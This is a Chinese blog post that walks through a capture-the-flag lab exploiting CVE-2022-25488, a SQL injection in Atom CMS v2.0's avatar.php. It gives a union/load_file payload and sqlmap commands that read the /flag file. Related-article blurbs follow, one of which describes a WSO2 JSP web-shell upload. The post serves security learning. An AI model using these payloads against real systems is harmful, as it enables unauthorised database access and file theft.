春秋云镜:CVE-2022-25488(SQL报错注入)

最新推荐文章于 2024-07-03 19:03:48 发布
最新推荐文章于 2024-07-03 19:03:48 发布
阅读量1.3k 收藏
点赞数 1
分类专栏: i春秋 文章标签: php 开发语言 web安全 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/130296485
版权
文章介绍了如何利用sqlmap工具进行SQL注入攻击,首先在/admin/ajax/avatar.php页面发现SQL注入点,然后通过报错注入方法尝试读取/flag文件内容。虽然没有找到flag表,但最终通过读取系统文件找到了隐藏的flag。
摘要由CSDN通过智能技术生成

目录

一、题目

二、sqlmap梭哈查flag

一、题目

介绍:

Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面

进入题目;

发现是Not Found页面 一开始以为打开的问题:

 

 一想 我们要访问的是/admin/ajax/avatar.php

访问后是空白页面:

查看前端源码:

 测试一下注入点?id=1

源码发生了变化:

 试试id=1'

源码没有变化:

在次验证一下   id=1 and 1=1 

字符型注入没错了

 由于flag没有在数据库的库名中显示,所以我们直接报错注入就好。

sql报错注入: 

 http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=-1 union (select load_file('/flag'))#

id=1 and 1=2 也可以 主要让id的语法错误 回显出来flag

 

二、sqlmap梭哈查flag

设置id=1 爆库 

python sqlmap.py -u http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=1 --batch -dbs

 虽然爆出来了 但是没有flag表

因为i春秋靶场默认flag就在根目录 我们可以直接查找/flag文件:

python sqlmap.py -u http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=1 --batch --file-read "/flag" --dbms mysql

跑出来会存在sqlmap的目录: 

 查看一下: 

 

  flag{6d6a2570-99f2-402f-aeb2-bb9b6da68247}

橙子学不会.
关注
专栏目录
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
[网络安全自学篇] 九十一.阿里云搭建LNMP环境及实现PHP自定义网站IP访问 (1)
杨秀璋的专栏
07-25 6397
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。本文主要分享作阿里云搭建LNMP环境及实现PHP自定义网站IP访问,同时详细介绍走过的坑,还发了朋友圈求助大家,再次感谢。本来想重新设置一个专栏分享基于阿里云的PHP网站搭建,但考虑到搞安全的也会面临各种靶场及个人网站搭建的情况,所以将这篇文章放置在“网络安全自学篇”中,后续还会分享PHP如何记录后台IP及Python定位经纬度等知识,希望对您有所帮助~
CVE-2022-25488
qq_42036164的博客
01-09 337
3.根据题目提示尝试url+?[在这里插入图片描述](https://img-blog.csdnimg.cn/5135d626f0af41c4bfb36a8d4f5a968c.png)4.尝试后发现存在注入点,sql注入读取文件`view-source:http://eci-2ze3oflmagdd2oq9a1p0.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?
春秋云境:CVE-2022-25488
一只爱吃橙子的羊
11-30 1494
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
春秋云境】CVE-2022-25488靶场WP和CVE-2022-25401靶场WP
果粒程
11-30 1341
春秋云境】CVE-2022-25488靶场WP和CVE-2022-25401靶场WP
春秋云境】CVE-2022-25488
ZXW_NUDT的博客
02-22 2621
春秋云境】CVE-2022-25488
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
热门推荐
杨秀璋的专栏
03-05 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
Atom CMS SQL注入(CVE-2022-25488
weixin_68999845的博客
08-16 504
CVE-2022-25488
Atom CMS SQL注入漏洞 (CVE-2022-25488
千寻的博客
12-01 1673
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
Atom CMS v2.0 SQL 注入漏洞(CVE-2022-25488
最新发布
Flag少侠的博客
07-03 1万+
打开靶场直接访问则是 404跟上题目的路径查看却是空白删除 avatar.php 文件发现能看到整个目录查看其他文件得到报错信息得到一个参数 id,使用 SQLMap 跟上试试id=1"_____H__[Y/n] n[Y/n] n[y/N] n------很好,接下来就是熟悉的找 flag 了_____H__------[Y/n] n。
CVE-2022-25488漏洞复现
2301_78321656的博客
07-10 1463
靶标介绍:Atom CMS v2.0 存在注入漏洞在/admin/ajax/avatar.php页面。5.尝试添加id=1,访问还是空白页面,再看查看源代码,里面是有东西的。3.根据题目提示可以查看/admin/ajax。6.直接利用load_file读取flag。4.存在目标点,直接点击访问就是空白页面。1.打开靶场,并进行访问。
春秋云境】CVE-2023-52064 uzhicms v4.1.0 被发现存在一个 SQL 注入漏洞
HMX404的博客
04-04 550
Wuzhicms v4.1.0 被发现存在一个 SQL 注入漏洞,该漏洞通过位于的$keywords参数触发。
春秋云境】CVE-2023-51048 闪灵S-CMS v5.0 后台SQL注入漏洞
HMX404的博客
04-17 701
S-CMS v5.0 被发现存在SQLI。
春秋云境靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 1411
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
春秋云境】CVE-2023-50563 SEMCMS 后台SQL注入
HMX404的博客
04-17 575
SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入
春秋云境:CVE-2022-29464
07-28
根据引用\[1\],CVE-2022-29464是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE(远程命令执行)权限。 根据引用\[2\],攻击者可以通过上传名为1.jsp的恶意文件来利用该漏洞。该文件包含了一个表单,其中包含一个名为"cmd"的输入框,攻击者可以在此输入框中输入命令,并通过点击"Run"按钮来执行该命令。该文件还包含了Java代码,用于执行命令并将输出返回给攻击者。 根据引用\[3\],该漏洞的受攻击的上传路由是/fileupload,由FileUploadServlet处理。而Identity.xml是一个配置文件,该文件上的路由(/fileupload)不受IAM(身份和访问管理)保护。 综上所述,CVE-2022-29464是一个严重的漏洞,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得远程命令执行权限。 #### 引用[.reference_title] - *1* [【春秋云境】CVE-2022-29464](https://blog.csdn.net/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)](https://blog.csdn.net/FODKING/article/details/125746993)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值